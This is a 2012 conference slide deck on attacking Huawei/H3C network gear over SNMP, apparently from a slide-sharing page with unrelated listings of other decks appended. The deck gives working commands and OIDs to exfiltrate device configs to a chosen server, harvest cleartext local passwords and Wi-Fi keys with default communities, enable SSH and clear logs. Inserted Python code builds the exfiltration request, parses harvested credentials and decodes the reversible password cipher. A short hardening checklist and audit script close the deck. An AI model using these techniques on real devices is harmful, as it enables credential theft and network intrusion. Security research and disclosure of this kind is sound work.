A CouNtry's Honorable n3twork deviCes
BayThreat 2012
@grutz
  





BACKGROUND
Disclaimer

Any content or opinion stated herein is that of myself and not of my employer. The information is being provided "as-is" and as a convenience, for informational purposes only. Any resemblance to real persons, living or dead, is purely coincidental. No warranty is expressed or implied. Not responsible for direct, indirect, incidental or consequential damages resulting from any defect, error or failure to perform. For recreational use only. May be too intense for some viewers.
  


POLITICS!

This presentation does not care about the politics between China, the US and any companies.

Data is presented to show the pervasive risk these new vulnerabilities create.

China was only used because they have the largest install base of Huawei and H3C equipment available via the Internet!
  


About @grutz…

Penetration tester

In the business of breaking into businesses
  



The Huawei/H3C/HP Timeline

2006: Huawei-3Com partnership
May 7, 2007: H3C is born!
Sep 28, 2007: Bain Capital / Huawei / 3Com deal
2008: US Gov't Smackdown
April 12, 2010: HP acquires H3C
Oct 8, 2012: US Gov't Huawei/ZTE Smackdown
  




Huawei != H3C

…except when they are (software)

Since the creation of H3C by Huawei-3Com the two companies diverged their product lines. Yet they still shared a very similar code origin (and bugs!).

Vulnerabilities described here and in FX's talk can generally affect Huawei devices in the Huawei-3Com years (2006-2010) and all H3C devices.
	
  
	
  
FX's Huawei DEFCON Bomb
  




Huawei's July 31, 2012 Response to c|net

http://news.cnet.com/8301-1009_3-57482813-83/expert-huawei-routers-are-riddled-with-vulnerabilities/
  
LET'S TALK BIG BANG
  


Overflows are cool…

…but they're finicky little beasts.

Huawei/H3C not as bad as Cisco IOS but, still… How many times have you used an IOS buffer overflow?
    No, really…
    Be serious here!

Now how many times have you used SNMP to download device configs?

Which would you rely upon for network penetration?
  

h3c (old) vs hh3c (new)

For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible-style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10.

For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB styles.

By default, devices use H3C new-style MIB files.

http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228



(T)FTP File Transfers: hh3c-config-man

(xx = the row index you choose for the hh3cCfgOperateTable entry)

Function                  OID                                    Operator
Operation type            1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx     1 - running2Startup
                                                                 2 - startup2Running
                                                                 3 - running2Net
                                                                 4 - net2Running
                                                                 5 - net2Startup
                                                                 6 - startup2Net
Protocol                  1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx     1 - ftp
                                                                 2 - tftp
                                                                 3 - clusterftp
                                                                 4 - clustertftp
Filename                  1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx     filename
Destination IP Address    1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx     IpAddress
Username                  1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx     FTP Username
Password                  1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx     FTP Password
RowStatus                 1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx     4 - go go go move move move! (RowStatus createAndGo)
  

hh3c-config-man caveats

Support is spotty between device types
    Mostly routers and switches work
    H3C ERxxxx Series: OpType = 1 (system2net)

Downloads are logged

Requires Read/Write community string

Buggy!
    Manual "snmpset" worked some of the time
    Metasploit module worked some of the time
  



Let's script…

https://github.com/grutz/h3c-pt-tools/blob/master/hh3c-snmpdl.sh
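The row-creation step behind the hh3c-config-man table and the caveats above, as an added example (this is not the deck's hh3c-snmpdl.sh and not vendor code). It builds the varbinds for one hh3cCfgOperateTable row and renders the matching net-snmp snmpset command line; it sends nothing on the wire. Column numbers and enum values are the deck's table; the row index ("xx" in the deck) is chosen by the caller; column 8 is not in the deck and is left alone; the h3c/hh3c prefix swap is the H3C MIB note quoted earlier in the deck. Target and server addresses are placeholders.

```python
"""Build the single SNMP SET that makes an H3C/Huawei device push its running
config to a TFTP/FTP server via hh3c-config-man (one hh3cCfgOperateTable row).
"""
import ipaddress
import shlex

NEW_STYLE = "1.3.6.1.4.1.25506"       # hh3c* (default on current images)
COMPAT_STYLE = "1.3.6.1.4.1.2011.10"  # h3c* compatible-style
CFG_OPERATE_ENTRY = NEW_STYLE + ".2.4.1.2.4.1"  # hh3cCfgOperateEntry

OP_TYPES = {"running2Startup": 1, "startup2Running": 2, "running2Net": 3,
            "net2Running": 4, "net2Startup": 5, "startup2Net": 6}
ER_SYSTEM2NET = 1            # deck caveat: ERxxxx series uses OpType 1 = system2net
PROTOCOLS = {"ftp": 1, "tftp": 2, "clusterftp": 3, "clustertftp": 4}
ROWSTATUS_CREATE_AND_GO = 4  # RFC 2579 RowStatus createAndGo ("go go go")


def to_compat_style(oid):
    """Map a new-style (hh3c, 25506) OID to its compatible-style (h3c, 2011.10) twin."""
    if not oid.startswith(NEW_STYLE + "."):
        raise ValueError("not a new-style H3C OID: " + oid)
    return COMPAT_STYLE + oid[len(NEW_STYLE):]


def build_config_transfer(row, op, proto, filename, server, user="", password="",
                          er_series=False, compat=False):
    """Return [(oid, snmpset_type, value), ...] for one config-transfer row.

    All columns plus RowStatus=createAndGo go into one SET so the agent sees a
    complete row and starts the transfer at once. net-snmp type letters:
    i = INTEGER, s = STRING, a = IPADDRESS.
    """
    if proto not in PROTOCOLS:
        raise ValueError("unknown protocol: " + proto)
    if er_series:
        op_value = ER_SYSTEM2NET
    elif op in OP_TYPES:
        op_value = OP_TYPES[op]
    else:
        raise ValueError("unknown operation: " + op)
    ipaddress.IPv4Address(server)  # raises on a malformed address
    needs_creds = proto in ("ftp", "clusterftp")
    if needs_creds and not (user and password):
        raise ValueError("FTP transfers need a username and password")

    base = CFG_OPERATE_ENTRY
    varbinds = [
        (f"{base}.2.{row}", "i", op_value),
        (f"{base}.3.{row}", "i", PROTOCOLS[proto]),
        (f"{base}.4.{row}", "s", filename),
        (f"{base}.5.{row}", "a", server),
    ]
    if needs_creds:
        varbinds += [(f"{base}.6.{row}", "s", user),
                     (f"{base}.7.{row}", "s", password)]
    varbinds.append((f"{base}.9.{row}", "i", ROWSTATUS_CREATE_AND_GO))
    if compat:  # older images that only answer the h3c* (2011.10) tree
        varbinds = [(to_compat_style(o), t, v) for o, t, v in varbinds]
    return varbinds


def snmpset_command(host, community, varbinds, version="1"):
    """Render the shell-quoted net-snmp command for the varbinds (deck uses -v 1)."""
    parts = ["snmpset", "-v", version, "-c", community, host]
    for oid, typ, value in varbinds:
        parts += [oid, typ, str(value)]
    return " ".join(shlex.quote(p) for p in parts)


if __name__ == "__main__":
    # Placeholder target and TFTP server; a read/write community is required.
    vb = build_config_transfer(1, "running2Net", "tftp", "rtr-1.cfg", "192.0.2.10")
    print(snmpset_command("192.0.2.1", "private", vb))
```

Remember the deck's own caveats when you run the printed command: the download is logged on the device, the community has to be read/write, and some images simply ignore the row.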
  




HP/H3C, SNMP, LOCAL ACCOUNTS AND YOU!
  




Usernames and Passwords in SNMP? Never!
  




Huawei/H3C Password Encryption Types

(h)h3cAuthMode designates the encryption storage type:
    0: No encryption
    3: Ciphertext "encryption"
        7-CZB#/YX]KQ=^Q`MAF4<1!!
    9: SHA-256 encryption
        $key$hash_digest_value
        (Since 2007, mostly AR devices)
  




hh3cUserLevel / hh3cUserState
  




What is MAX-ACCESS and read-create?

RFC-1902: SMI for SNMPv2

(read-create is the MAX-ACCESS level for columns of a conceptual row that a manager may create, for example through RowStatus; it includes read access, so such an object can be fetched with a read-only community unless the agent's MIB view excludes it.)
  



…so it's protected, right?

Sure it is!
    Unless you know the SNMP READ ONLY string…
    This was probably a bug… or a misunderstanding…
  




Let's glob some users!

$ snmpwalk -c public -v 1 <host> 1.3.6.1.4.1.2011.10.2.12.1.1.1

Walks the locally defined list of users:

    local user <username>
        password <clear|cipher|sha256> <value>
        level [0|1|2|3]
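Turning that walk into something usable, as an added example (not the deck's tooling). It parses `snmpwalk -On` output of the (h)h3c-user table into one record per local account and produces the kind of counts the deck reports later (cleartext vs. ciphered vs. SHA-256, username == password). The table base OIDs and the authMode values are the deck's; the column numbering (1 name, 2 password, 3 authMode, 4 level, 5 state) is my reading of H3C-USER-MIB and an assumption. The walk below is constructed, not captured from a device; the cipher and SHA-256 strings in it are the deck's examples.

```python
"""Parse an (h)h3c-user table walk (numeric OIDs, `snmpwalk -On`) and summarize it."""
import re

USER_TABLES = ("1.3.6.1.4.1.2011.10.2.12.1.1.1",  # h3cUserInfoTable (compatible style)
               "1.3.6.1.4.1.25506.2.12.1.1.1")    # hh3cUserInfoTable (new style)
COLUMNS = {1: "name", 2: "password", 3: "auth_mode", 4: "level", 5: "state"}  # assumed
AUTH_MODES = {0: "cleartext", 3: "cipher", 9: "sha256"}  # (h)h3cAuthMode per the deck
LINE_RE = re.compile(r"^\.?(?P<oid>[\d.]+)\s*=\s*(?P<type>\w[\w-]*):\s*(?P<val>.*)$")

# Constructed sample: three accounts, one per storage type. The index of each
# row is the username as a length-prefixed OID string (5.97.100.109.105.110 = "admin").
SAMPLE_WALK = """\
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.1.5.97.100.109.105.110 = STRING: "admin"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.1.3.104.51.99 = STRING: "h3c"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.1.2.112.119 = STRING: "pw"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.2.5.97.100.109.105.110 = STRING: "admin"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.2.3.104.51.99 = STRING: "7-CZB#/YX]KQ=^Q`MAF4<1!!"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.2.2.112.119 = STRING: "$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.3.5.97.100.109.105.110 = INTEGER: 0
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.3.3.104.51.99 = INTEGER: 3
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.3.2.112.119 = INTEGER: 9
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.4.5.97.100.109.105.110 = INTEGER: 3
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.4.3.104.51.99 = INTEGER: 3
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.4.2.112.119 = INTEGER: 1
"""


def _value(typ, raw):
    """Convert the printed value: INTEGER -> int, anything else -> unquoted string."""
    if typ == "INTEGER":
        return int(re.search(r"-?\d+", raw).group())
    return raw.strip().strip('"')


def _index_to_name(idx):
    """Decode a length-prefixed string index; fall back to the dotted form."""
    if idx and idx[0] == len(idx) - 1:
        return bytes(idx[1:]).decode("latin-1")
    return ".".join(map(str, idx))


def parse_user_walk(text):
    """Group the walk's varbinds by row index into one dict per local account."""
    users = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        oid = m.group("oid").strip(".")
        prefix = next((t + ".1." for t in USER_TABLES if oid.startswith(t + ".1.")), None)
        if prefix is None:
            continue  # not part of either user table
        parts = [int(x) for x in oid[len(prefix):].split(".")]
        col, idx = parts[0], parts[1:]
        name = _index_to_name(idx)
        rec = users.setdefault(name, {"name": name})
        if col in COLUMNS:
            rec[COLUMNS[col]] = _value(m.group("type"), m.group("val"))
    for rec in users.values():
        rec["auth"] = AUTH_MODES.get(rec.get("auth_mode"), "unknown")
    return list(users.values())


def summarize(users):
    """The numbers the deck reports: storage types, user==password, unique cleartext."""
    clear = [u for u in users if u["auth"] == "cleartext"]
    return {
        "accounts": len(users),
        "cleartext": len(clear),
        "cipher": sum(u["auth"] == "cipher" for u in users),
        "sha256": sum(u["auth"] == "sha256" for u in users),
        "user_eq_pass": sum(u.get("password") == u["name"] for u in clear),
        "unique_passwords": len({u["password"] for u in clear if "password" in u}),
    }


if __name__ == "__main__":
    for u in parse_user_walk(SAMPLE_WALK):
        print(u)
    print(summarize(parse_user_walk(SAMPLE_WALK)))
```

Point it at a real walk with `snmpwalk -On -c public -v 1 <host> 1.3.6.1.4.1.2011.10.2.12.1.1.1 > walk.txt` and pass the file contents to parse_user_walk; MIB-resolved (symbolic) output is deliberately not handled.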
	
  
	
  




Let's Weaponize it!
  




Other SNMP goodies…

(h)h3c-dot11-cfg - (requires R/W access)
    SSID / PSKs
        snmpwalk -v 1 -c private ip-address 1.3.6.1.4.1.2011.10.2.75

(h)h3c-ssh - (requires R/W access)
    SSH Server disabled? Enable it!
        snmpset -v 1 -c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1
           	
  
	
  

Strap In and Let's Scan China!
  




INCONCEIVABLE!

http://www.okean.com/chinacidr.txt
    2,444 netblocks
    290,118,656 hosts
    Only care about SNMP

Onesixtyone to the rescue!
    Originally by Solar Eclipse
    Updated in 2011 by Paul Flo Williams:
    https://github.com/hisdeedsaredust/onesixtyone
  




L33t b@$h sk1ddy

For best results use a VPS/host from a country China trusts
  



China Network Device Counts (Oct 2012)

(Bar chart: devices answering SNMP, by vendor, two series: SNMP R/O and SNMP R/W)
    Huawei / H3C:   117,033 (R/O)   88,517 (R/W)
    ZTE:             64,579 (R/O)   33,669 (R/W)
    Cisco:           11,278 (R/O)    2,475 (R/W)
    vxWorks:          8,121
    Juniper:            273 (R/O)       99 (R/W)

Source: Personal scan of China netblock ranges using SNMP strings "public", "private", "h3c", "china" and "telecom"
  


Compare H3C results from ShodanHQ
  




(h)h3c-user Results

Devices with locally defined accounts:   15,588
Devices with ciphered passwords:          5,132
Devices with cleartext passwords:        15,263

Total accounts/passwords:                33,938
Unique passwords:                         3,898
Username == Password:                     2,101
Unique version strings:                     686

A majority of cleartext-only passwords were from one Telecom company.
  

What Type of Accounts are these?

Local users can be used for:
    Remote management access (telnet, ssh, web)
    VPN access

In most cases telnet, ssh and http were open on devices with locally defined accounts.
  




Device type breakdown

Huawei/H3C VRP:               2,293
SecPath/SecBlade Firewalls:     464
WA2xxx Access Points:         2,771
Huawei Quidway:               3,205
  
	
  
	
  
	
  




SO ABOUT THAT CIPHER…
  


Huawei/H3C Not Unique In This

Weak and reversible ciphers seem to have been the standard for all networking companies at one time:
    Cisco Type 7 Vigenère cipher
    Juniper $9$

Generally these are used because some protocols need to use cleartext passwords, yet these should not be stored in the clear.

So… why not ROT13? Just as secure…
  

Cipher Examples

CLEARTEXT                  CIPHER
a                          D(HD%5.*MN;Q=^Q`MAF4<1!!
aa                         P+J^5@ZGG[3Q=^Q`MAF4<1!!
aaa                        +Q4Z3D_*-N[Q=^Q`MAF4<1!!
123                        7-CZB#/YX]KQ=^Q`MAF4<1!!
aaaa                       EHHC8L%9.F3Q=^Q`MAF4<1!!
aaaaa                      X`9:NJ_A#$WQ=^Q`MAF4<1!!
aaaaaa                     B.7)"^_<OGCQ=^Q`MAF4<1!!
huawei                     N`C55QK<`=/Q=^Q`MAF4<1!!
aaaaaaaa                   2P;JH_C3'+_Q=^Q`MAF4<1!!
aaaaaaaaaaaaaaaaaaaa       2P;JH_C3'+^'^KG@[*)9LZ*ZYF[R'$:5M(0=0)*5WWQ=^Q`MAF4<<"TX$_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!
aaaaaaaaaaaaaaaaaaaaaaaa   2P;JH_C3'+^'^KG@[*)9LU<WK:`IEBCP2P;JH_C3'+_Q=^Q`MAF4<<"TX$_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!
  


Want more examples? jfgi!
  




This means something…

Ciphers are 24 or 88 chars in length

'!!' at the end of everything
    Base64 rotational? Good idea, but no… didn't pan out.

Consistent last few bytes of data:
    Q=^Q`MAF4<1!!

Consistent first 10 bytes (2P;JH_C3'+) when the cleartext is >= 8 characters
  

Probably using a block-based cipher

Identical plaintext blocks encrypt to identical cipher blocks:
           	
  
	
  
           	
  




Binary/ASCII Encoding

Let's assume DES-ECB:
    Probably a static key
    Input = cleartext + null padding
    Output = binary data

Binary result converted to printable ASCII
ASCII NOT Base64 but similar (4 chars to 3 bytes)

A consistent cipher string length based on source length means we're probably correct.
  
	
  
	
  
Let's decode to binary!

    def decode_cipher(cipher):
        """Turn the printable cipher string back into bytes: 4 chars -> 3 bytes.

        Each char carries 6 bits (ord(char) - 33, so '!' is 0 and '`' is 63).
        The encoder writes 'a' where it would otherwise emit '?', so map 'a'
        back to '?' before subtracting.  The slide's two-column version only
        shifted the accumulator when the char was not 'a'; the shift has to
        happen for every char or the 'a' case corrupts the preceding bits.
        """
        if len(cipher) % 4:
            raise ValueError("cipher length must be a multiple of 4")
        result = bytearray()
        chkval = ord('a')
        cipher_loc = 0
        cipherlen = len(cipher)
        # converter works in groups of 4 until cipherlen is reached
        for cnt in range(0, cipherlen, 4):
            cv2 = 0
            for group in range(4):          # groups 1..4 of the slide
                cv1 = ord(cipher[cipher_loc])
                if cv1 == chkval:
                    cv1 = ord('?')
                cv1 = cv1 - 33
                cv2 = (cv2 << 6) | cv1
                cipher_loc += 1
            # output: 24 accumulated bits become three bytes
            result.append((cv2 & 0xff0000) >> 16)
            result.append((cv2 & 0xff00) >> 8)
            result.append(cv2 & 0xff)
        return result
  
        	
  cipher_loc	
  +=	
  1	
                                                	
  
                                                                                   	
  

Huawei's Solution

Use AES-256 and updated software for SNMP

Yes… AES-256… A symmetric cipher.

http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
  
	
  



HP/H3C's Solution

Use SHA-256 on those systems that support it

Upgrade your code for the SNMP fix.

https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685
  
	
  




So about this SHA-256…

Yeah, salted SHA-256. Not reversible but crackable!

h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5
pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878
  

	
  
	
  
	
  




NOW WHAT?
  


Things to watch out for

All commands are logged locally
    > reset logbuffer

Keyboard keys are very annoying
    Backspace is not backspace, unless it's ^H
  
	
  
	
  




See All Packets!!!

    <rtr1> system-view
    [rtr-1] interface tunnel 1/0/1
    [rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0
    [rtr-1-Tunnel1/0/1] tunnel-protocol gre
    [rtr-1-Tunnel1/0/1] source 10.10.1.1
    [rtr-1-Tunnel1/0/1] destination 192.168.1.1
    [rtr-1-Tunnel1/0/1] quit
    [rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1

    linux# modprobe ip_gre
    linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255
    linux# ip link set gre0 up
    linux# ip addr add 10.10.10.2/24 dev gre0
  



PROTECT YOURSELF
  


Be protected… Be be protected!

Don't configure local accounts, use RADIUS or TACACS+

Don't configure SNMPv1

Don't use default SNMP strings

Disable the snmp view for (h)h3c-user:
    snmp-agent mib-view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1
    snmp-agent mib-view excluded 1.3.6.1.4.1.25506.2.12.1.1.1

Use SHA256 passwords if your image supports it
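The checklist above as a config audit, as an added example (not a vendor tool and not the deck's code). It scans a saved Comware/VRP-style configuration for the things the slide tells you to avoid: default or scan-list community strings, SNMPv1 enabled, the (h)h3c-user table left inside the MIB view, and local accounts, especially ones with cleartext or reversible-cipher passwords. Both sample configurations are constructed. Assumptions: local accounts appear as `local-user <name>` blocks with `password simple|clear|cipher|sha256 <value>` (the deck's sketch says `clear`; Comware's keyword is `simple`, so both are accepted), enabled versions appear on `snmp-agent sys-info version`, and `snmp-agent mib-view excluded` may carry a view name before the OID tree, as Comware's syntax does (the deck's two lines omit it). The RADIUS lines in the hardened sample are illustrative only.

```python
"""Audit a Comware/VRP-style config against the deck's 'Be protected' list."""
import re

USER_TABLE_OIDS = ("1.3.6.1.4.1.2011.10.2.12.1.1.1",  # h3c-user
                   "1.3.6.1.4.1.25506.2.12.1.1.1")    # hh3c-user
WEAK_COMMUNITIES = {"public", "private", "h3c", "china", "telecom"}  # the deck's scan list

SAMPLE_CONFIG = """\
#
 sysname rtr-1
#
local-user admin
 password simple admin
 level 3
local-user ops
 password cipher 7-CZB#/YX]KQ=^Q`MAF4<1!!
 level 3
#
snmp-agent
snmp-agent community read public
snmp-agent community write private
snmp-agent sys-info version v1 v2c
snmp-agent mib-view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1
#
"""

HARDENED_CONFIG = """\
#
 sysname rtr-1
#
radius scheme corp
 primary authentication 192.0.2.20
#
snmp-agent
snmp-agent sys-info version v3
snmp-agent mib-view excluded ViewDefault 1.3.6.1.4.1.2011.10.2.12.1.1.1
snmp-agent mib-view excluded ViewDefault 1.3.6.1.4.1.25506.2.12.1.1.1
#
"""


def audit_config(text):
    """Return a list of findings (empty means the slide's checklist is satisfied)."""
    findings, local_users, excluded, versions = [], [], set(), set()
    current_user = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "#":     # '#' separates config sections
            current_user = None
            continue
        m = re.match(r"local-user\s+(\S+)", line)
        if m:
            current_user = {"name": m.group(1), "storage": None}
            local_users.append(current_user)
            continue
        m = re.match(r"password\s+(simple|clear|cipher|sha256)\s+\S+", line)
        if m and current_user is not None:
            current_user["storage"] = m.group(1)
            continue
        m = re.match(r"snmp-agent community\s+(read|write)\s+(\S+)", line)
        if m:
            kind, community = m.groups()
            if community.lower() in WEAK_COMMUNITIES:
                findings.append(f"default/weak SNMP {kind} community '{community}'")
            continue
        m = re.match(r"snmp-agent sys-info version\s+(.+)", line)
        if m:
            versions.update(m.group(1).split())
            continue
        m = re.match(r"snmp-agent mib-view excluded\s+(?:\S+\s+)?([\d.]+)", line)
        if m:
            excluded.add(m.group(1))
    if "v1" in versions or "all" in versions:
        findings.append("SNMPv1 enabled")
    for oid in USER_TABLE_OIDS:
        if not any(oid.startswith(e) for e in excluded):
            findings.append(f"user table {oid} still readable (no mib-view exclusion)")
    for u in local_users:
        if u["storage"] in ("simple", "clear"):
            findings.append(f"local-user {u['name']}: cleartext password")
        elif u["storage"] == "cipher":
            findings.append(f"local-user {u['name']}: reversible cipher password")
    if local_users:
        findings.append(f"{len(local_users)} local account(s) defined; use RADIUS or TACACS+ instead")
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print("FINDING:", f)
    print("hardened:", audit_config(HARDENED_CONFIG))
```

Excluding the user table from the view stops the read-only harvest described earlier in the deck, but it does nothing for the other read-create tables (hh3c-config-man, the dot11 and ssh trees), so the community-string and SNMPv1 findings matter at least as much.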
  
http://github.com/grutz/h3c-pt-tools/
http://grutztopia.jingojango.net/

Thanks to #metasploit, hdm, FX, eMaze (Ivan and Roberto), HP/H3C and Huawei IRTs, US-CERT and others whom I may have forgotten

QUESTIONS?
  



Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 

Último (20)

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
